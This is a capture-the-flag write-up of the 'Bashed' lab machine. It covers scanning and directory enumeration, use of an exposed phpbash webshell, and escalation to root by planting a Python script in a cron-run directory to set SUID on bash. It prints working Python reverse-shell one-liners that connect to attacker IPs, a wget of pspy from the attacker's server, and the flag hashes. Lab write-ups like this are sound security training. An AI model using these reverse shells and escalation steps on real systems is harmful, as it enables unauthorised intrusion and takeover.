Bashed

Bashed

‎$ whoami

Scanning

sudo nmap -A -T4 -v 10.10.10.68 -oA scans/scan

Only http is open

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Visiting the website:

image

phpbash? Reading through the article, we are given a github repo

Embed GitHub

None of the menu items work, lets enumerate some directories 

dirsearch -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r

Got some directories

image

Viewing the github repo, we see that phpbash is normally located in /uploads/

image

Check that dir.

Not that easy

image

Lets checkout other directories we found.

Found nothing of interest until the /dev/ directory

image

Is it this easy?

image

it really is this easy. we can access the user flag

image
f26dfc3d5f1f90a96b1869ab0fe6e825

Can we get a revshell?

image

Try this python one

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.25",42069));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
image

Pasted into webshell and hit enter

image

upgrade our shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
image

Lets see if we can privesc

image

we can run as the scriptmanager user? lets jump to that user.

sudo -u scriptmanager /bin/bash
image

Can we get to root? Found /scripts/ directory

with three files:

image
scriptmanager@bashed:/scripts$ cat write.py
cat write.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")

write.py is spawning a shell in some way

cat test.txt
testing 123!scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$

test.txt is writing a file. but the file is written as root?

are these being executed? lets get pspy

Embed GitHub

On our machine:

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

host http server

python3 -m http.server 80

on victim

wget http://10.10.14.25/pspy64
chmod +x pspy64
./pspy64
image

It is being executed!

image

UID=0, so its root. 

/bin/sh -c cd /scripts; for f in *.py; do python "$f"; done

This should mean it’s executing ANY .py script in that directory. Lets see if we can just write on that adds SUID to bash.

import os

os.system("sudo chmod +s /bin/bash")
image

wget onto box and wait.

image

Looks like it executed

image

now all we have to do is

bash -p
image

Thats root!

1c476338bc925ceff2eb36cf72fc5c23